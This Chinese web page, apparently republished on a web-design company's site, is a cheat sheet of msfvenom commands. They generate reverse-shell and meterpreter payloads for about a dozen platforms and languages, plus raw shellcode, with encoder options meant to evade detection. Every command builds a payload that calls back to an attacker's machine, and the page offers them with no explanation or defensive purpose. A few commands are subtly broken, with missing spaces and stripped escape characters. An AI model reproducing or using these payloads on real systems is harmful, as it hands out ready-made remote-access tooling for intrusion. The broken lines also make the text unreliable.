msfvenom生成命令payload怎么用

這篇文章主要介紹“msfvenom生成命令payload怎么用”的相關(guān)知識(shí),小編通過實(shí)際案例向大家展示操作過程,操作方法簡(jiǎn)單快捷,實(shí)用性強(qiáng),希望這篇“msfvenom生成命令payload怎么用”文章能幫助大家解決問題。

10年積累的成都做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)經(jīng)驗(yàn),可以快速應(yīng)對(duì)客戶對(duì)網(wǎng)站的新想法和需求。提供各種問題對(duì)應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識(shí)你,你也不認(rèn)識(shí)我。但先建設(shè)網(wǎng)站后付款的網(wǎng)站建設(shè)流程,更有扶溝免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

windows:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3

mac:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機(jī)IPLPORT=攻擊機(jī)端口 -f macho -o payload.macho

android:

//需要簽名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f apk -o payload.apk

powershell:

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -e cmd/powershell_base64 -i 3

linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f elf -o payload.elf

php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n'

aspx:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f aspx -o payload.aspx

jsp:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o payload.jsp

war:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o payload.war

nodejs:

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -opayload.js

python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o payload.py

perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -opayload.pl

ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -opayload.rb

lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -opayload.lua

windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f c

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機(jī)IPLPORT=攻擊機(jī)端口 -f c

關(guān)于“msfvenom生成命令payload怎么用”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí),可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,小編每天都會(huì)為大家更新不同的知識(shí)點(diǎn)。

名稱欄目:msfvenom生成命令payload怎么用
URL標(biāo)題:http://bm7419.com/article44/jdighe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供品牌網(wǎng)站建設(shè)、網(wǎng)站改版、網(wǎng)站導(dǎo)航網(wǎng)站設(shè)計(jì)、網(wǎng)站維護(hù)、移動(dòng)網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

成都app開發(fā)公司